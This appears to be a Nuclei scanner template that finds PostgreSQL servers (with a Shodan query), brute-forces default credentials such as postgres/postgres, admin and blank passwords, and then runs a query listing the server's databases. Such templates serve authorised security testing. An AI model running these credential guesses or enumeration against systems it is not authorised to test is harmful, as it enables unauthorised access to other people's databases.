53 lines
1.7 KiB
YAML
53 lines
1.7 KiB
YAML
id: pgsql-list-database
|
||
|
||
info:
|
||
name: PostgreSQL List Database
|
||
author: pussycat0x
|
||
severity: high
|
||
description: |
|
||
A single Postgres server process can manage multiple databases at the same time. Each database is stored as a separate set of files in its own directory within the server’s data directory.
|
||
reference:
|
||
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
|
||
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
|
||
metadata:
|
||
verified: true
|
||
max-request: 8
|
||
shodan-query: "product:\"PostgreSQL\""
|
||
tags: js,network,postgresql,authenticated,enum
|
||
javascript:
|
||
- pre-condition: |
|
||
var m = require("nuclei/postgres");
|
||
var c = m.PGClient();
|
||
c.IsPostgres(Host, Port);
|
||
code: |
|
||
const postgres = require('nuclei/postgres');
|
||
const client = new postgres.PGClient;
|
||
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
|
||
Export(connected);
|
||
|
||
args:
|
||
Host: "{{Host}}"
|
||
Port: 5432
|
||
User: "{{usernames}}"
|
||
Pass: "{{password}}"
|
||
Db: "{{database}}"
|
||
|
||
payloads:
|
||
usernames:
|
||
- postgres
|
||
- admin
|
||
password:
|
||
- postgres
|
||
-
|
||
- 123
|
||
- amber
|
||
database:
|
||
- postgres
|
||
|
||
attack: clusterbomb
|
||
|
||
extractors:
|
||
- type: json
|
||
json:
|
||
- '.Rows[].datname'
|
||
# digest: 4a0a0047304502202a9ac9ae53e00f334f110df2b9ea9e5505c76a361e91cf72cd1295f53864a3fd022100e07fd8e28bbc7292dd0b3b86acfe064187b48fb8354af3a0f109a3367ff34416:922c64590222798bb761d5b6d8e72950 |